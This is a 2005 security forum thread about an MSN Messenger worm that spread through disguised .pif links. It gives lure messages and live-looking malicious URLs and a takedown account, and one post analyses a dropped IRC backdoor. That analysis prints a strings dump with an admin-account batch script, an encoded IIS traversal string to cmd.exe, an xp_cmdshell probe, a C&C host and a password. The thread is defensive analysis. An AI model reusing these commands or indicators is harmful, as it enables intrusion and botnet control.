News: MSN Virus - Do not click on link.
Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: News: MSN Virus - Do not click on link.

  1. #1
    Fastest Thing Alive s0nIc's Avatar
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    Exclamation News: MSN Virus - Do not click on link.

    Hot and fresh off the kitchen....

    When someone on msn sends u this link

    http://home.earthlink.net/~gallery10/omg.jpg

    do not accept it.

    coz once u accept it, its actually

    http://home.earthlink.net/~gallery10/omg.pif

    i have yet to look around what it does, i will update it if its a hoax or not. but for now. avoid that link. I have just recieved a msg on MSN with same said link by an old friend. she went offline after the msg was sent. Which explains why my friend went offline after sending me the link. Simmilar cases were told to me by other people i know over MSN and IRC.

    Ive had someone in IRC just told me about it recently. he also recieved the msg from someone.


    UPDATE: 10 mins past

    So far, all ive dug up in the past few mins is there have been several simmilar cases in the past few weeks and just today .pif masked as a .jpg and being passed around on links...

    Apparently it doesnt only does .pif but it also does .exe .bat .vbs aswell.

    As far as ive found out,the files automatically sends variations of itself to ur contacts and signs u off automatically...

    it is the Bropia again! its spreading quick here in Australia. God we're way behind.. we gettin attacked by a worm that existed a month ago...

    This is apparently same case.. just different links.

    Source: http://www.computerworld.com/securit...,99524,00.html
    Source: http://www.gmailforums.com/lofiversi...php/t8546.html

    Ill find more..

    Fix: http://securityresponse.symantec.com...oval.tool.html

  2. #2

    Bropha.K

    On the blog from F-Secure, their latest post mentions a new version of this one, called Bropha.K that came out Sunday.
    The link to their blog for a little more info is here.

  3. #3
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,884
    This is what I have:

    Early AM, EST, information came about an MSN messenger worm that spread by
    sending the following message: "http://home.earthlink.net/~gallery10/omg.pif lol! see it! u'll like it"

    I would estimate millions got infected.

    Once going to that page, the Trojan horse was downloaded onto your PC,
    and in turn it downloaded three other Trojan horses, also hosted at
    Earthlink.

    One of them then proceeded to connect to a botnet command and control
    IRC server.

    Due to international cooperation between ISP's, AV companies and CERTs
    on a secure and vetted drone armies and malicious web sites coordination
    group (yes, I am a member of this group), all the sites and the C&C IRC server were killed by their
    authoritative owner.

    Taking the sites down effectively stopped the spread of the worm, and
    killing the C&C assured that the infected users won't be later used as a
    group for illegal purposes such as DDoS, spam, etc. We go into action
    when worms go out.

    This was done in a very short time, and while there were no signatures
    yet for this worm from AV companies.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  4. #4
    Senior Member
    Join Date
    Jan 2004
    Posts
    199
    Same here (in the uk), but with the format of

    omg this is funny! http://jose.rivera4.home.att.net/cute.pif

    ---- DON'T CLICK IT
    -

  5. #5
    Junior Member
    Join Date
    Jan 2002
    Posts
    26
    Got it with another message and link:
    Again in the UK

    "haha look at us"
    "http://designoflife.net/youandme.pif"
    I have plent of thought and talent. I just don\'t give a damn

  6. #6
    Senior Member
    Join Date
    Sep 2001
    Posts
    1,027
    Yeah, I (err, actually, my sister) got the same one as mikester2 at around 16:30 UTC-5 yesterday, but had the brilliant idea of opening it... :rolleyes:

    Now, it installed a bunch of adware that was rather easiliy removed, but left two running processes:
    hotkeysvc.exe
    winfrw.exe

    hotkeysvc is cited in the symantec and other AV vendors writeups...

    winfrw.exe however I haven't seen mentionned anywhere (nor does google turn up anything).
    A quick `strings` on it reveals that it seems to be an IRC botnet trojan/backdoor that amongst other things creates a user and group on the target machine, tries to connect to mssql servers with a blank SA account then execute a localhost ping with the xp_cmdshell extended stored procedure, contains a unicode encoded /script/../../cmd.exe directory traversal attempt, and such.

    md5 hash of the winfrw.exe file (if anyone want's to compare):
    23eabd0e6a6e5ea6ed1987eb3821c847 *winfrw.exe


    Ok, here's the (interesting parts of the) actual strings output if that interests anyone:
    Code:
    
    ExitProcessExitProcess
    GetModuleHandleA
    GetTickCount
    CloseHandle
    WriteFile
    CreateFileA
    SetFileAttributesA
    CopyFileA
    SetCurrentDirectoryA
    GetWindowsDirectoryA
    GetModuleFileNameA
    CreateThread
    GetLastError
    CreateMutexA
    lstrlenA
    lstrcmpA
    GetFileAttributesA
    GetVersionExA
    GetSystemInfo
    GlobalMemoryStatus
    DeleteFileA
    Sleep
    ReadFile
    GetFileSize
    lstrcmpiA
    TerminateProcess
    OpenProcess
    FindClose
    FindNextFileA
    FindFirstFileA
    KERNEL32.dll
    DispatchMessageA
    TranslateMessage
    GetMessageA
    ShowWindow
    CreateWindowExA
    RegisterClassExA
    LoadCursorA
    LoadIconA
    GetDesktopWindow
    DefWindowProcA
    SetWindowsHookExA
    SetKeyboardState
    SetTimer
    MoveWindow
    wsprintfA
    GetWindowTextA
    GetForegroundWindow
    UnhookWindowsHookEx
    PostQuitMessage
    CloseWindow
    CallNextHookEx
    ToAscii
    GetKeyboardState
    GetKeyNameTextA
    GetActiveWindow
    DestroyWindow
    SendMessageA
    IsWindow
    USER32.dll
    DeleteObject
    GetDIBColorTable
    BitBlt
    SelectObject
    CreateDIBSection
    DeleteDC
    CreateCompatibleDC
    GetDeviceCaps
    CreateDCA
    GDI32.dll
    RegCloseKey
    RegSetValueExA
    RegCreateKeyExA
    ADVAPI32.dll
    ShellExecuteA
    SHELL32.dll
    ODBC32.dll
    strstr
    strtok
    sprintf
    atol
    atoi
    strncpy
    rand
    srand
    strncat
    free
    malloc
    ??3@YAXPAX@Z
    ??2@YAPAXI@Z
    MSVCRT.dll
    InternetGetConnectedState
    WININET.dll
    WS2_32.dll
    capGetDriverDescriptionA
    capCreateCaptureWindowA
    AVICAP32.dll
    WNetCloseEnum
    WNetEnumResourceA
    WNetOpenEnumA
    MPR.dll
    GetModuleBaseNameA
    EnumProcesses
    GetModuleFileNameExA
    EnumProcessModules
    PSAPI.DLL
    URLDownloadToFileA
    urlmon.dll
    FBI.USA.GOV
    /scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33
    e%65%78%65?/c+
    SysCfg
    Explorer
    PRIVMSG %s :%s
    hak-
    open
    @echo off
    net user /add System hakt
    net localgroup /add Administrators System
    del %0
    temp.bat
    Windows System Configuration
    \WINFRW.EXE
    USER %s %s %s :%s
    NICK %s
    QUIT :Received WM_ENDSESSION message.
    QUIT :Received WM_QUIT message.
    QUIT :Received WM_QUERYENDSESSION message.
    #komo
    bo.timzoz.net
    88FinalSolution88
    Windows Security Updater
    Software\Microsoft\Windows\CurrentVersion\Run
    QUIT :Received WM_DESTROY message.
    QUIT :Received WM_CLOSE message.
    PONG %s
    PING
    PRIVMSG %s :Version %d.%d (%s). Your mother sucks **** in hell.
    version
    random
    icmp
    PRIVMSG %s :Active window: %s.
    active
    PRIVMSG %s :File not found.
    send
    exec
    PRIVMSG %s :Connected to IRC for: %d day(s), %d hour(s), and %d m
    PRIVMSG %s :System Uptime: %d day(s), %d hour(s), and %d minute(s
    uptime
    PRIVMSG %s :OS: Windows %s. IP: %d.%d.%d.%d. Memory: %d/%dMB. CPU
     processor(s). Uptime: %d day(s), %d hour(s), and %d minute(s).
    %s (%s)
    2000
    sysinfo
    PRIVMSG %s :Error while executing file.
    PRIVMSG %s :File executed.
    PRIVMSG %s :Error while downloading file.
    PRIVMSG %s :File downloaded.
    PRIVMSG %s :Downloading %s to %s...
    klolol
    PRIVMSG %s :Error while capturing amateur video from webcam.
    PRIVMSG %s :Amateur video saved to %s.
    video
    PRIVMSG %s :Error while capturing from webcam.
    PRIVMSG %s :Webcam capture saved to %s.
    frame
    PRIVMSG %s :Capture driver #%d - %s - %s.
    drivers
    PRIVMSG %s :Error while capturing screen.
    PRIVMSG %s :Screen capture saved to %s.
    screen
    capture
    PRIVMSG %s :KeySpy disabled.
    PRIVMSG %s :KeySpy enabled.
    PRIVMSG %s :KeySpy already enabled.
    keyspy
    PRIVMSG %s :Spoof IP set to '%s'.
    PRIVMSG %s :'%s' is an invalid IP address (it's not hard).
    %d.%d.%d.*
    PRIVMSG %s :Spoofing currently set to '%s'.
    PRIVMSG %s :Spoofing disabled.
    spoof
    PRIVMSG %s :Unable to resolve host.
    PRIVMSG %s :Resolved %s to %s.
    PRIVMSG %s :Unable to delete %s.
    PRIVMSG %s :%s has been deleted.
    delete
    pscan
    PRIVMSG %s :Can't resolve IRC server.
    PRIVMSG %s :Connecting clone to %s[:%s].
    PRIVMSG %s :Max clones reached.
    load
    PRIVMSG %s :Clones killed.
    kill
    clone
    PRIVMSG %s :Enable password set to '%s', bot disabled.
    disable
    PRIVMSG %s :Password accepted, commands enabled.
    enable
    PRIVMSG
    PRIVMSG %s :Initializing DCC console...
    CHAT
    PRIVMSG %s :Downloading '%s' through DCC (%d bytes)...
    PRIVMSG %s :CreateFile() failed.
    SEND
    PRIVMSG %s :DCC resume is not supported (yet).
    RESUME
    JOIN %s %d
    PONG %s
    JOIN %s
    Enter
    Backspace
    PRIVMSG %s :
    %d(KeySpy) %s
    (%s)
    PRIVMSG %s :Error sending packets to %s. eax=SOCKET_ERROR, WSAGet
     sizeof(buffer) = %d. Packets sent sucessfully = %d.
    PRIVMSG %s :Finished sending packets to %s. Sent %d packet(s). ~%
    t (~%dK/s).
    %d.%d.%d.%d
    PRIVMSG %s :Sending packets to %s...
    PRIVMSG %s :Invalid target IP.
    PRIVMSG %s :Error calling setsockopt(). WSAGetLastError() returns
    PRIVMSG %s :Error calling socket().
    PRIVMSG %s :You cant send packets for 0 seconds.
    PRIVMSG %s :Received %s (%d bytes).
    PRIVMSG %s :connect() failed.
    PRIVMSG %s :socket() failed.
    PRIVMSG %s :Sent %s to %s. (%d bytes).
    PRIVMSG %s :send() failed.
    PRIVMSG %s :Transfer accepted, sending...
    PRIVMSG %s :accept() failed.
    PRIVMSG %s :DCC send timed out.
    PRIVMSG %s :
    DCC SEND %s %d %d %d
    NOTICE %s :DCC Send %s (%s)
    PRIVMSG %s :Sending file to %s...
    PRIVMSG %s :bind() failed.
    DISPLAY
    Window
    PRIVMSG %s :Unicode vulnerable server on %s.
    HTTP/1.0 200 OK
    HTTP/1.1 200 OK
    GET %sdir HTTP/1.1
    Connection: close
    PRIVMSG %s :SQL server with open 'sa' account on %s.
    xp_cmdshell 'ping 127.0.0.1'
    %s%s%s
    DRIVER={SQL Server};SERVER=
    ;UID=sa;PWD=
    %s.%d
    %s.%d.%d
    PRIVMSG %s :IP range scan complete.
    PRIVMSG %s :Open port found on %s[:%d].
    %s.%d.%d.%d
    PRIVMSG %s :IP range scan started...
    PRIVMSG %s :DCC console closed.
    EnumProcesses() failed.
    Error while killing process.
    Syntax: process kill <pid>.
    Error while enumerating modules.
    Syntax: process modules <pid>.
    Sub-commands of 'process':
      list, kill, modules.
    End of process list.
    %s - %d.
    unknown
    Number of active processes: %d.
    list
    Process terminated.
    End of module list.
    %s (0x%08X)
    Listing modules...
    modules
    process
    End of directory list.
    <%s>
    Listing Directory: %s.
    Error while deleting file.
    File deleted.
    Error while copying file.
    File copied.
    copy
    Sub-commands of 'file':
      dir.
    file
    End of network list.
    enumerate
    Sub-commands of 'network':
      enumerate.
    network
      file, process, network.
    Available commands:
    help
    Welcome to the Wisdom DCC console.
    Current system uptime: %d day(s), %d hour(s) and %d minute(s).
    PRIVMSG %s :DCC console activated.
    
    The process also opens and listens on ports tcp 559 and udp 123, but connecting with netcat on them doesn't return anything (and I can't seem to coax it to return any message by sending it stuff).

    Now AFAIK this does look like a gabot or spybot variant (I think), but on virustotal.com, only the following vendors detected it (as of the time of this post):

    This is a report processed by VirusTotal on 03/08/2005 at 01:22:19 (CET)after scanning the file "WINFRW.EXE" file.
    Antivirus Version Update Result
    AntiVir 6.30.0.5 03.07.2005 BDS/Wisdoor.K
    AVG 718 03.07.2005 no virus found
    BitDefender 7.0 03.07.2005 BehavesLike:Win32.IRC-Backdoor
    ClamAV devel-20050130 03.08.2005 Trojan.Wisdoor-6
    DrWeb 4.32b 03.07.2005 no virus found
    eTrust-Iris 7.1.194.0 03.07.2005 no virus found
    eTrust-Vet 11.7.0.0 03.07.2005 no virus found
    Fortinet 2.51 03.08.2005 no virus found
    F-Prot 3.16a 03.07.2005 no virus found
    Ikarus 2.32 03.07.2005 no virus found
    Kaspersky 4.0.2.24 03.08.2005 Backdoor.Win32.Wisdoor.av
    NOD32v2 1.1021 03.07.2005 probably unknown NewHeur_PE virus
    Norman 5.70.10 03.07.2005 no virus found
    Panda 8.02.00 03.07.2005 W32/Gaobot.DLA.worm
    Sybari 7.5.1314 03.08.2005 W32/Sdbot.worm.gen
    Symantec 8.0 03.07.2005 no virus found
    Yesterday only 4 vendors detected it (antivir, clamav, Kaspersky, NOD32v2)

    I also sent the file to symantec (which I use) and isc.sans.org...

    The good news is that the link it was downloaded from was quickly disabled and returned a code 500 around midnight already.


    Ammo
    Credit travels up, blame travels down -- The Boss

  7. #7
    Senior Member gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    Originally posted here by mikester2
    Same here (in the uk), but with the format of

    omg this is funny! [ u rl ] http://jose.rivera4.home.att.net/cute.pif [ / url]

    ---- DON'T CLICK IT
    Perhaps you could edit this message of yours and select NOT to parse URLs?

    " Automatically parse URLs: automatically adds [ url ] and [ /url ] around internet addresses. "

    That one.

    Not that this link can really do a thing to me but someone else could accidently click on it while scrolling the text and trying to scroll back down or something.

  8. #8
    Senior Member
    Join Date
    Sep 2001
    Posts
    1,027
    That link doesn't actually work anymore, it returned a code 500 last night and is now explicitly forbidden (403)... (Although I agree that not parsing it is a good thing)

    Ammo
    Credit travels up, blame travels down -- The Boss

  9. #9
    Hoopy Frood
    Join Date
    Jun 2004
    Posts
    662
    These look to be variants of the W32.Kelvir virus (also called Bropia as s0nic stated). These are the four variants that Symantec lists.

    http://securityresponse.symantec.com....kelvir.a.html
    http://securityresponse.symantec.com....kelvir.b.html (this one has a S.S.)
    http://securityresponse.symantec.com....kelvir.c.html
    http://securityresponse.symantec.com....kelvir.d.html

    - Xierox
    "Personality is only ripe when a man has made the truth his own."

    -- Søren Kierkegaard

  10. #10
    Senior Member
    Join Date
    Sep 2001
    Posts
    1,027
    Ok, I just got a reply from Symantec concerning my file submission: it was assigned the new designation Backdoor.Solufina

    This message is an automatically generated reply. This system is designed to analyze and process virus submissions into the Symantec Security Response and cannot accept correspondence or inquiries.
    Please contact your Technical Support representative if more detailed information about your submission is required. Do not reply to this message.

    Below is a status update on your virus submission:

    Date: March 7, 2005

    &lt;ammo&gt;



    Dear &lt;ammo&gt;,

    We have analyzed your submission. The following is a report of our
    findings for each file you have submitted:

    filename: E:\Users\ammo\forensics\WINFRW.EXE
    machine:
    result: This file is infected with Backdoor.Solufina

    Developer notes:
    E:\Users\ammo\forensics\WINFRW.EXE is non-repairable threat. Please delete this file and replace it if necessary. Please follow the instruction at the end of this email message to install the latest rapidrelease definitions.

    Symantec Security Response has determined that the sample(s) that you provided are infected with a virus, worm, or Trojan. We have created RapidRelease definitions that will detect this threat. Please follow the instruction at the end of this email message to download and install the latest RapidRelease definitions.
    Symantec is now building a new set of definitions to include the threat you have submitted. The approximate time to complete this process is one hour. We recommend checking the ftp site periodically over the next 60 to 90 minutes to download these definitions as soon as they are available.

    Downloading and Installing RapidRelease Definitions:
    1. Open your Web browser. If you are using a dial-up connection, connect to any Web site, such as: http://securityresponse.symantec.com/
    2. Copy and paste the address ftp://ftp.symantec.com/public/englis...ease/sequence/ into the address bar of your Web browser and then press Enter.(this could take a minute or so if you have a slow connection)
    3. Now select 41880 folder or a higher. Open the folder.
    4. Select the file symrapidreleasedefsi32.exe
    5. When a download dialog box appears, save the file to the Windows desktop.
    6. Double-click the downloaded file and follow the prompts.

    ----------------------------------------------------------------------
    This message was generated by Symantec Security Response automation

    Should you have any questions about your submission, please contact
    our regional technical support from the Symantec website
    (http://www.symantec.com/techsupp/)
    and give them the tracking number in the subject of this message.



    --------------------------------------------

    Since it seems to be a new backdoor (or at least variation) I guess I should go double check that the IRC server the binary tries to connect to is informed/shutdown...


    Ammo
    Credit travels up, blame travels down -- The Boss

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •